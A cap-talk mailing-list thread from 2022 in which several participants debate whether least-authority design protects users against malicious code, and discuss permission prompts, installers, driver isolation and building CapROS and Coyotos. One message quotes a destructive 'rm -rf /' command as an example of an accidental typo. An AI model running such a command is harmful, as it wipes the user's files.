re: pola etc.

27 views
Skip to first unread message

Raoul Duke

unread,
Aug 11, 2022, 4:31:05 PM8/11/22
to cap-...@googlegroups.com
The problem is, I also need to know exactly what the code is going to
do with it, not just that it wants refined access. Code can
maliciously leak stuff. Code can also even accidentally leaks stuff,
too. To me it is all from a UX security perspective still very much a
bit of a bad joke to have all these fine-grained popups on our
devices. What good does it do me, really? What good does it do overall
when people get worn down by them in the first week? I don't think we
should just leave the barn doors open, no, and I do believe in
defense-in-depth vs. crimes of opportunity. Tho with digital copies
one fundamentally cannot ever take the data back / scour it after
being leaked. The only way to win is not to play. I wish all security
presentations started with that quote on the first slide just to be
clear and honest. /grumpytoday.

Mark S. Miller

unread,
Aug 11, 2022, 7:36:27 PM8/11/22
to cap-...@googlegroups.com
Hi Raoul, what is this responding to?


--
You received this message because you are subscribed to the Google Groups "cap-talk" group.
To unsubscribe from this group and stop receiving emails from it, send an email to cap-talk+u...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/cap-talk/CAJ7XQb696GsEA13_pyr5kCWCFh5UQwsB5AkErjxP4iU0MBGzNw%40mail.gmail.com.


--
  Cheers,
  --MarkM

Raoul Duke

unread,
Aug 11, 2022, 8:48:50 PM8/11/22
to cap-...@googlegroups.com
Apologies, that was just a "re:" in the expansive sense of all
attempts to improve security and UX, not a direct reply to any
particular single message here.

Mark S. Miller

unread,
Aug 11, 2022, 9:13:01 PM8/11/22
to cap-...@googlegroups.com
On Thu, Aug 11, 2022 at 1:31 PM Raoul Duke <rao...@gmail.com> wrote:
The problem is, I also need to know exactly what the code is going to
do with it, not just that it wants refined access.

What? IIUC, I could not disagree more. The whole point of POLA is to bound risk by bounding authority. I need to know that a bound is enforced. I do *not* need to know exactly what it does within that bound.
 
Code can
maliciously leak stuff. Code can also even accidentally leaks stuff,
too.

We know how to prevent overt leakage, so I assume you're talking about non-overt channels.
Aside from crypto keys, which should be specially protected anyway, we can and should generally engineer systems so that integrity does not depend on confidentiality. Authority should be access limited, not knowledge limited. For such systems done right, code can at most leak information, not access and authority.

To leak even information over non-overt channels, there must be someone within earshot to read that non-overt channel.
 
To me it is all from a UX security perspective still very much a
bit of a bad joke to have all these fine-grained popups on our
devices. What good does it do me, really? What good does it do overall
when people get worn down by them in the first week?

Are you aware that this community practices POLA at the UI in a way that minimizes, not just such popups, but minimizes all interaction rituals that a user would understand as being only about security?
 
I don't think we
should just leave the barn doors open, no, and I do believe in
defense-in-depth vs. crimes of opportunity. Tho with digital copies
one fundamentally cannot ever take the data back / scour it after
being leaked.

Preventing information leakage (confidentiality) is indeed much harder than preventing authority leakage (integrity). And yes, with proper prearrangement authority can be revoked. Knowledge cannot be. Our security claims and practices need to take such constraints into account.
 
The only way to win is not to play. I wish all security
presentations started with that quote on the first slide just to be
clear and honest. /grumpytoday.

The game I care about is to facilitate cooperation, and to lower the risk of cooperation. Robust composition. For that game, to not play is to lose.


--
  Cheers,
  --MarkM

Raoul Duke

unread,
Aug 11, 2022, 9:54:53 PM8/11/22
to cap-...@googlegroups.com
Thanks for your note.

(I am a pessimist.)

Sure, there are things that themselves do make sense to me e.g. maybe
drag and drop is implicit permission to open only that file. I think
there are layers of it being useful based on how personal/local the
action is.

As soon as networking gets involved, it seems like all bets are off.
Asking me "can program foobar can talk to server foobar.com?" doesn't
really help me all that much, even if foobar==somewellknowncorp. I
mean i just rubber stamp things for the most part. There's no way I
can vet what they are doing on their side heaven knows. And the local
app in question could have been saving up all sorts of sneaky things
to splurt out over the network if I eventually allow it for some use
case of mine later on. "Do you want to share image X? Then (a) give me
permission to read it locally [ok, i guess] and (b) give me permission
to use the network <utterly arbitrarily with no real restrictions
because, what, you are going to somehow audit each and every message
that goes over protobuf or something?> so i can send it, thanks!"

On occasion sure I've said no to some sketchy permission request
and/or then uninstalled some app and maybe that saved me from
something malicious there and then, but in general if I've got an app
I already obtained it from somewhere that i kind of already "trust"
but I don't know what the thing is really really really doing under
the covers... i just click through... the dialog boxes asking to allow
it to "read my photos" or "use the network" don't really tell me what
on earth it is really truly doing with the resource once it has that
permission. (Let alone just look at the app stores and how ungranular
their permissions are and how apps that I would personally absolutely
never install based on what they declare for their permissions needs
still have millions of downloads and 4+ star reviews, wtf.)

And once any digital information is out of the barn, that's it, game
over, end of story.

I'm more enamored with it in terms of people writing their own code
and wanting to avoid mistakes where they somehow end up screwing
themselves. Oops I didn't mean to "rm -rf / home/myself/SecretDocs"
etc. Although I have had it up to here with Xcode asking me every
damned time I run my unit tests if it can have permission to access my
Documents folder, for example.

So even if there were a way for all this to work in theory, frankly I
have zero proof / lots of negative proof that on the whole it will be
done well enough en masse.

Ben Laurie

unread,
Aug 12, 2022, 11:58:57 AM8/12/22
to cap-talk
On Fri, 12 Aug 2022 at 02:13, Mark S. Miller <eri...@gmail.com> wrote:
On Thu, Aug 11, 2022 at 1:31 PM Raoul Duke <rao...@gmail.com> wrote:
The problem is, I also need to know exactly what the code is going to
do with it, not just that it wants refined access.

What? IIUC, I could not disagree more. The whole point of POLA is to bound risk by bounding authority. I need to know that a bound is enforced. I do *not* need to know exactly what it does within that bound.

 You are correct, of course, but I think the point Raoul is trying to make is that POLA doesn't solve all the problems with processing data.

Of course, it does solve many interesting problems - but it does not directly help with situations where I *want* to share data but I want certainty about what happens to that data. POLA doesn't directly help with that but it certainly is a useful tool.

Solving this problem is what Project Oak is all about, of course - and is a way harder problem to solve.

BTW, another failure mode I see a lot with POLA is a total failure to put any thought into what authorities are useful to grant and how to manage them.


 
Code can
maliciously leak stuff. Code can also even accidentally leaks stuff,
too.

We know how to prevent overt leakage, so I assume you're talking about non-overt channels.
Aside from crypto keys, which should be specially protected anyway, we can and should generally engineer systems so that integrity does not depend on confidentiality. Authority should be access limited, not knowledge limited. For such systems done right, code can at most leak information, not access and authority.

To leak even information over non-overt channels, there must be someone within earshot to read that non-overt channel.
 
To me it is all from a UX security perspective still very much a
bit of a bad joke to have all these fine-grained popups on our
devices. What good does it do me, really? What good does it do overall
when people get worn down by them in the first week?

Are you aware that this community practices POLA at the UI in a way that minimizes, not just such popups, but minimizes all interaction rituals that a user would understand as being only about security?
 
I don't think we
should just leave the barn doors open, no, and I do believe in
defense-in-depth vs. crimes of opportunity. Tho with digital copies
one fundamentally cannot ever take the data back / scour it after
being leaked.

Preventing information leakage (confidentiality) is indeed much harder than preventing authority leakage (integrity). And yes, with proper prearrangement authority can be revoked. Knowledge cannot be. Our security claims and practices need to take such constraints into account.
 
The only way to win is not to play. I wish all security
presentations started with that quote on the first slide just to be
clear and honest. /grumpytoday.

The game I care about is to facilitate cooperation, and to lower the risk of cooperation. Robust composition. For that game, to not play is to lose.


--
  Cheers,
  --MarkM

--
You received this message because you are subscribed to the Google Groups "cap-talk" group.
To unsubscribe from this group and stop receiving emails from it, send an email to cap-talk+u...@googlegroups.com.

Bill Frantz

unread,
Aug 12, 2022, 1:34:33 PM8/12/22
to cap-...@googlegroups.com

On Aug 11, 2022, at 21:54:39, Raoul Duke <rao...@gmail.com> wrote:

As soon as networking gets involved, it seems like all bets are off.
Asking me "can program foobar can talk to server foobar.com?" doesn't
really help me all that much, even if foobar==somewellknowncorp. I
mean i just rubber stamp things for the most part. There's no way I
can vet what they are doing on their side heaven knows. And the local
app in question could have been saving up all sorts of sneaky things
to splurt out over the network if I eventually allow it for some use
case of mine later on.

"Do you want to share image X? Then (a) give me
permission to read it locally [ok, i guess] and (b) give me permission
to use the network <utterly arbitrarily with no real restrictions
because, what, you are going to somehow audit each and every message
that goes over protobuf or something?> so i can send it, thanks!”

We can avoid the problem of stashed secrets by implementing sharing of X by creating an object which has no secret data when it is created which does the sharing. Using the KeyKOS concept of a “Factory” this might look like:

  sharer = discrete.new(dataSharer(powerbox));
  sharer();

discrete checks that the dataSharer factory is indeed discrete (i.e. has no outside data connections) and creates an instance if that is true. The call on sharer() causes the sharing to take place. The sharer uses the powerbox passed to acquire access to the data to be shared. For the remote site, the powerbox returns a capability which gives the right to send/receive on a TLS channel that was build by trusted code. Now we only need to trust the other end named by the user.

Cheers - Bill


Raoul Duke

unread,
Aug 12, 2022, 7:38:20 PM8/12/22
to cap-...@googlegroups.com
I feel like POLA is still a little too pie-in-the-sky or simplistic
for me in terms of how it helps me vs. malicious code specifically. It
seems to me there are lots of architectural issues that would be
'underneath' and undermining in many important real-world scenarios
for the foreseeable future en masse. I guess another way of saying it
would be to ask on what current systems do people think POLA can truly
help vs. evil code. When an app wants to install on Window I get a
dialog box asking me if the setup.exe can make (arbitrary) changes to
my entire hard drive. Even if it were to say that it was going to try
to restrict itself in some ways I think the cognitive load is simply
too much for users. Does joe-user really know what folders should be
allowed? How much of the registry should be allowed? etc. I sure do
not. If the app only has successful POLA after it has been installed,
are not all bets are off since who knows what crazy or nefarious
things it might have done during that install phase. Do we have to
boil the OS ocean in order to get an actually robust non-fig-leaf
false sense of security benefit for joe-users in the world? Presumably
until at least the OS fundamentally requires, supports, enforces all
the nuances it is still kind of hypothetical? (I do differentiate
between using POLA to help me not screw myself accidentally vs. trying
to defend against malicious code. The former makes sense to me, the
latter always feels unrealistic to me. And I am ignoring side channel
attacks.) I guess POLA feels logically maybe-necessary to me, but not
sufficient.

Ian Denhardt

unread,
Aug 12, 2022, 8:37:55 PM8/12/22
to Raoul Duke, cap-...@googlegroups.com
Quoting Raoul Duke (2022-08-12 19:38:06)

> Does joe-user really know what folders should be
> allowed? How much of the registry should be allowed? etc. I sure do
> not. If the app only has successful POLA after it has been installed,
> are not all bets are off since who knows what crazy or nefarious
> things it might have done during that install phase.

Right, so two design principle; apps should be asking for access when
they need it, not at install time this has two benefits:

- It becomes much easier for the user to understand why the app is
asking, since if legitimate it will likely be based on something they
just asked the app to do.
- The "permissions" request can often be folded into a functionality
choice -- so in the ideal case you go to File -> Open, and select a
file through the powerbox, same UX as is common today -- no need for a
separate/explicit *permission* prompt, since if you wanted to deny the
request you'd just hit "cancel"

Retrofitting this onto existing systems is

> Do we have to boil the OS ocean in order to get an actually robust
> non-fig-leaf false sense of security benefit for joe-users in the
> world? Presumably until at least the OS fundamentally requires,
> supports, enforces all the nuances it is still kind of hypothetical?

Rolling this out in light of existing systems is definitely the hard
part. But there's no need to boil the ocean before seeing any benefit.
I can e.g. use Sandstorm for some collaborative web-app things, where
it's able to do them, and gain the benefits within that scope, before
I've fixed the whole world.

But yeah, dealing with legacy systems is a pain.

Alan Karp

unread,
Aug 13, 2022, 12:43:29 AM8/13/22
to cap-...@googlegroups.com
On Fri, Aug 12, 2022 at 5:37 PM Ian Denhardt <i...@zenhack.net> wrote:

But yeah, dealing with legacy systems is a pain.

Polaris pointed the way to do this, but Bromium (now owned by HP) did it far better.  Each application runs in its own light-weight virtual
machine using copy-on-write.  The result is very strong isolation between instances of applications.  Even a successful attack against
the OS gains nothing, and the user experience is nearly identical to a standard Windows system.  The one thing they haven't done
(yet?) is to support things like comparing two documents.

--------------
Alan Karp

William ML Leslie

unread,
Aug 13, 2022, 3:14:58 AM8/13/22
to cap-talk
+1.  Raoul mentioned installers - this a great case for being able to examine the filesystem changes a program has made during a transaction, and then committing or rolling it back.  I haven't gotten that far yet, but I want to do this when we start representing a hierarchical file system to legacy programs in Coyotos.  Running a legacy program, by default, won't apply changes to your filesystem, you will get an overlay with a diff that you can examine and will have to approve to apply.  I expect we'll get to a point where we can clearly identify some pre-XDG_HOME patterns and encode most of the places programs actually touch into either the initial grant (app config) or custom shell wiring (c.f. Shill).

I don't quite like this for new programs, but I do think that visibility together with undo is great for those cases where undo is feasible.  Of course, it isn't always feasible, so you still need POLA.

I sympathise with the original point, though.  Firstly, for a user, security questions are often difficult to understand.  Poor abstractions compound the problem; in an Android app I've needed to ask for complete access to removable media to be able to read a single file.  One of my favourite Android vulnerabilities, StrandHog, is confusion of whether you're granting access to an Activity or a Task.  I'm hyper aware of this sort of thing, and I still couldn't tell you how and when most apps make use of the access they have been granted, or how long the app will remain authorised.  It also bothers me that apps can tell if you've said no; android should really provide those apps with a stub that produces plausible nonsense.

As an example, WhatsApp requires the "Phone" permission.  You can't make IP calls without it.  The reason is understandable - they want to switch to hold mode when you get an incoming call.  The permission itself is much broader though, potentially giving Meta access to your call history metadata.  There's evidently nothing I can do about this, unless I want to disable it and re-enable every time I open or close WhatsApp.

On a related note, I'd love to have an app that would show the Android 11 drop down for notifications and settings on Android 12, as I really dislike having to swipe twice.  Unfortunately, this is the most trusted part of the UI; there's no API on android that can get you a notification drop-down that wouldn't require dangerous levels of access, and even if it were feasible, no way to know from Google Play that the app really is exactly what the source claims to be in the repo.  Maybe I've missed the tutorial on writing your own android system shell and that's just a thing people do.

I seem to have strayed from "POLA doesn't solve everything" to "Vexing points in Android's security model" but somehow it doesn't feel to me like I've veered off the original point.  Am I getting close, Raoul?

--
William ML Leslie

Raoul Duke

unread,
Aug 13, 2022, 3:16:13 PM8/13/22
to cap-...@googlegroups.com
> Android woes. 

Agreed that the main stream (mobile, desktop, and ha ha iot?) has yet to build a successful reasonable, usable, actually more secure pola based experience. Not that it would be easy. 

That should not stop people from trying to push forward, all credit to the people here who have been leading the uphill battle. !!!!!!








...rambling ensues, apologies, you have been warned:

There's the delta between the pragmatic reality vs. what vocabulary is used to describe & market things. Things like Bromium incorporate a little bit too much heuristics to me from what I read. Unfortunately it is of limited availability? Good that it has been successful, and I absolutely wish I could have that right now immediately on all my devices! 

My knee jerk / pie in the sky complaint is that as a simpleton human my desire is to have a human mental model, in a natural language supporting interrogatives on top of an underpinning of legal+logical definitions formally analyzed, of what is going to / currently is / might later be happening to my data. I don't see how we can claim people are in control of their data otherwise.

There are too many nuances involved in delivering the features and experiences people respond to, we could never vet nor explain them all. Extracting an image fingerprint for similar image search - is that just for me locally to find all my cat photos or is it for CSAM with questionable oopsy throw away the key bad result potentialities? Worser: all the claims of handling and limiting PII carefully vs. all the cracks and leaks of datasets which can then be statistically merged to get pinpoint results. 

At some level it is the difference between business done on a handshake vs. a 300 page prenup. Any form of permission is open to misinterpretation either accidentally or on purpose, hence the legal system to work out ahem misunderstandings. As blockchain contracts seem to me to have proven, I'd sort of prefer the law of the land gets involved with real regulation and consequences for bad action,  the leaky software contract abstraction oopsies will burn some folks badly, inevitably. But i also fear the meat grinder that is the user-to-prison pipeline. And digital data is pandora's horse out of the barn gate. Anything we do is a band aid fundamentally. (Tho maybe homomorphic operations can reduce the rate at which bits are exfiltratable?)

Is Trust something that can be formalized in a robust yet usable way? Not saying that is a new question. I realize that is the underpinning of what people here dedicate themselves to! Flip side is to formalize Threats. A calculus. I hope the work in that area continues. 

I think there are so many ways for digital systems to break trust either on accident or on purpose that we need a clear set of terms for it so we can have concise framings of exactly what the threat model being addressed is, and how statistically strong it is, and which let us compose with components that address other parts of the threat-trust-security-usability gestalt. 

(A fundamental oy veh existential throw my hands up in the air fear of mine is that who cares how much work goes into upper layers when god knows there are bugs and back doors and sploits all through the hardware stack. So i end up feeling like security can mainly realistically only help me from screwing myself with typos, and maybe can stop occasional script kiddie crimes of opportunity.)





Raoul Duke

unread,
Aug 13, 2022, 3:19:54 PM8/13/22
to cap-...@googlegroups.com
> Installers 

probably also needs maybe a successful way to control hardware driver opaque binary blobs?

also, trust chains are weak links i feel. so many ways to do mitm on certs and obviously always a high target priority for every kind of tricky or $$$ overt penetration engineering. 

William ML Leslie

unread,
Aug 14, 2022, 12:28:03 AM8/14/22
to cap-talk
On Sun, 14 Aug 2022 at 05:19, Raoul Duke <rao...@gmail.com> wrote:
> Installers 

probably also needs maybe a successful way to control hardware driver opaque binary blobs?

I admit I'm not sure what "control" means in this case.  There's benefit to both good capability oriented APIs for device and driver management and hardware like the IOMMU for restricting the reach of devices.  To be clear, there's still a hole there during initialisation in the form of PCI Option ROMs.


also, trust chains are weak links i feel. so many ways to do mitm on certs and obviously always a high target priority for every kind of tricky or $$$ overt penetration engineering. 

Again I'm not sure what you're referring to.  Still, in the case of many trust chains, they just don't confirm anything meaningful.  Consider app signing on iOS - what is the threat model that this is trying to address, exactly?  If it's trying to confirm that the image is the one that the developer built and hasn't been modified in transit, well, you can already have that level of tamper resistance with TLS.

--
William ML Leslie

Raoul Duke

unread,
Aug 14, 2022, 1:08:45 AM8/14/22
to cap-...@googlegroups.com
> Installers, drivers, certs.

Just that if the overarching thing is "how do we manage Trust all the
way down, and out" then no matter how good the installer UI is, if
what I am doing is installing some binary blob driver, the entire
gestalt of the process of installing things also ideally has ways to
make sure drivers are not doing mean things I dislike in the long run
- yes, the job of the OS architecture and implementation, not the
installer app per se.

Bill Frantz

unread,
Aug 14, 2022, 11:24:24 PM8/14/22
to cap-...@googlegroups.com
In KeyKOS on the 370, we gave drivers, which could be user-written, access to a specific device the Device capability. Since the full channel programming model of the 370 had been used for some significant security problems, we strongly limited the channel programs that could be run. We did use this system to run our terminals and our tape drives.

CapROS has a system for running “out of the box” Linux drivers in domains, but I don’t know much about how it works. For systems with memory mapped I/O, the memory mapping may be enough to limit a process to just one I/O device.

There’s a lot if ifs here, but with proper hardware architecture, it should be possible to run untrusted I/O drivers. At a minimum you want to be able to isolate devices so a process/domain can be limited to only one device. You want any direct memory access system to be limited to specific pages and devices, the way we did in 370 KeyKOS.

Cheers - Bill

Raoul Duke

unread,
Aug 14, 2022, 11:48:36 PM8/14/22
to cap-...@googlegroups.com
Are any of the KeyKOS lineage something we could ever run today on
real hardware? That would be awesome i feel like. :)
https://en.wikipedia.org/wiki/KeyKOS
https://www.cis.upenn.edu/~eros goes to a 404

William ML Leslie

unread,
Aug 15, 2022, 5:47:13 AM8/15/22
to cap-talk
Neither of these are really ready to make a song and dance about yet.

CapROS almost builds, we need to update some of the included libraries: https://github.com/capros-os

Coyotos runs, it just doesn't do very much. I've been trying to nail down some of the system-level details (secretary, shell, etc) and haven't been keeping the repo up to date, but you can at least build from my branch: https://gitlab.com/william-ml-leslie/coyotos

If you want to try them out at this point, you'll need to build the cross tools yourself.  The capros-os version of the tools is slightly more up-to-date.
 
--
William ML Leslie

William ML Leslie

unread,
Aug 15, 2022, 5:56:38 AM8/15/22
to cap-talk
On Mon, 15 Aug 2022 at 13:24, Bill Frantz <fra...@pwpconsult.com> wrote:

CapROS has a system for running “out of the box” Linux drivers in domains, but I don’t know much about how it works. For systems with memory mapped I/O, the memory mapping may be enough to limit a process to just one I/O device.

It exposes the PCI configuration space and resource maps for the driver as native capabilities:


It 's very nice, and everything it does, it gets right.  The only missing thing is securing device-initiated DMA (imao) and by extension the IOMMU, which is only on relatively recent hardware.


There’s a lot if ifs here, but with proper hardware architecture, it should be possible to run untrusted I/O drivers. At a minimum you want to be able to isolate devices so a process/domain can be limited to only one device. You want any direct memory access system to be limited to specific pages and devices, the way we did in 370 KeyKOS.

There's the additional step of selecting drivers for attached hardware and how to expose them to programs.  I _think_ Raoul's concerns about loading binary blobs fall into the first case:  if you are sure about which driver gains access to the device, you can make sure that other drivers can't upload malicious firmware.

--
William ML Leslie

Valerio Bellizzomi

unread,
Aug 15, 2022, 6:12:38 AM8/15/22
to cap-talk
Hi William, which OS do you use to build Coyotos?

William ML Leslie

unread,
Aug 15, 2022, 6:59:56 AM8/15/22
to cap-talk
On Mon, 15 Aug 2022 at 20:12, Valerio Bellizzomi <vbell...@gmail.com> wrote:
Hi William, which OS do you use to build Coyotos?

Originally (2020), Guix, but using a tailored cross package.

Up until two weeks ago, debian stable, to reduce the number of moving parts.

The last couple of weeks I've been building on Pop!_OS.

It should build on pretty much anything; if you can build GCC and Binutils, and you've got openssl and some boost libraries, you can build the cross tools.  You'll also need python3 to build CapROS.

--
William ML Leslie

William ML Leslie

unread,
Aug 15, 2022, 7:27:16 AM8/15/22
to cap-talk
On Mon, 15 Aug 2022 at 20:12, Valerio Bellizzomi <vbell...@gmail.com> wrote:
Hi William, which OS do you use to build Coyotos?

I mean - I'm aware that the correct answer is "T2 SDE" - it's just that despite having watched Rene for hundreds of hours, I'm not sure what the easy way is to package the cross tools.  They are mostly a bunch of patches against Binutils, GCC, and newlib; the full source for the cross tools is an annoyingly large package.  I bet if you just want it to work, it's not that hard, but I haven't tried to package it for T2.


--
William ML Leslie

Charlie Landau

unread,
Aug 15, 2022, 4:36:41 PM8/15/22
to cap-...@googlegroups.com
On 8/15/22 2:56 AM, William ML Leslie wrote:
On Mon, 15 Aug 2022 at 13:24, Bill Frantz <fra...@pwpconsult.com> wrote:

CapROS has a system for running “out of the box” Linux drivers in domains, but I don’t know much about how it works. For systems with memory mapped I/O, the memory mapping may be enough to limit a process to just one I/O device.

It exposes the PCI configuration space and resource maps for the driver as native capabilities:
And on ARM, I/O is memory-mapped. CapROS can't protect any memory smaller than a page, but that's not usually a problem.

--
Charlie Landau
he/him/his (Why Pronouns Matter)

Charlie Landau

unread,
Aug 15, 2022, 4:50:23 PM8/15/22
to cap-...@googlegroups.com
On 8/15/22 2:47 AM, William ML Leslie wrote:
On Mon, 15 Aug 2022 at 13:48, Raoul Duke <rao...@gmail.com> wrote:
Are any of the KeyKOS lineage something we could ever run today on
real hardware? That would be awesome i feel like. :)
https://en.wikipedia.org/wiki/KeyKOS
https://www.cis.upenn.edu/~eros goes to a 404


Neither of these are really ready to make a song and dance about yet.

CapROS almost builds, we need to update some of the included libraries: https://github.com/capros-os
At http://www.capros.org/ there is a link to a mailing list which will receive occasional updates on CapROS development.

Jonathan S. Shapiro

unread,
Aug 15, 2022, 8:07:47 PM8/15/22
to cap-talk
The same is true with EROS. On the ARM chip, this could be protected by a fast-path kernel trap, but that's about the best we get.

--
You received this message because you are subscribed to the Google Groups "cap-talk" group.
To unsubscribe from this group and stop receiving emails from it, send an email to cap-talk+u...@googlegroups.com.

Rob Meijer

unread,
Aug 16, 2022, 3:08:00 AM8/16/22
to cap-...@googlegroups.com
I believe that when it comes to retrofitting POLA, all to often the same wrong question gets asked. 

"Why does potentially malicious application X need access to location Y where multiple entities store sensitive or not to be overwritten data?"

When the question should be:

"Why does entity Z need to use location Y to store sensitive or not to be overwritten data?"

Some old slides from an abandoned project (slide 21 ..27 are most relevant).


--
You received this message because you are subscribed to the Google Groups "cap-talk" group.
To unsubscribe from this group and stop receiving emails from it, send an email to cap-talk+u...@googlegroups.com.

Mark S. Miller

unread,
Aug 16, 2022, 2:00:31 PM8/16/22
to cap-...@googlegroups.com
On Tue, Aug 16, 2022 at 12:08 AM Rob Meijer <pib...@gmail.com> wrote:
I believe that when it comes to retrofitting POLA, all to often the same wrong question gets asked. 

"Why does potentially malicious application X need access to location Y where multiple entities store sensitive or not to be overwritten data?"

When the question should be:

"Why does entity Z need to use location Y to store sensitive or not to be overwritten data?"

Some old slides from an abandoned project (slide 21 ..27 are most relevant).


That's a really good slideshow! Is there also a recorded talk? I'd love to watch it sometime.
 

Rob Meijer

unread,
Aug 18, 2022, 7:56:18 AM8/18/22
to cap-...@googlegroups.com
On Tue, 16 Aug 2022 at 20:00, Mark S. Miller <eri...@gmail.com> wrote:


On Tue, Aug 16, 2022 at 12:08 AM Rob Meijer <pib...@gmail.com> wrote:
I believe that when it comes to retrofitting POLA, all to often the same wrong question gets asked. 

"Why does potentially malicious application X need access to location Y where multiple entities store sensitive or not to be overwritten data?"

When the question should be:

"Why does entity Z need to use location Y to store sensitive or not to be overwritten data?"

Some old slides from an abandoned project (slide 21 ..27 are most relevant).


That's a really good slideshow! Is there also a recorded talk? I'd love to watch it sometime.
 

It seems not. It was recorded at the OHM2013 conference and there are a lot of videos available from that conference, in different places,
but after looking for it for about two hours, I can't seem to find it.
 
Reply all
Reply to author
Forward
0 new messages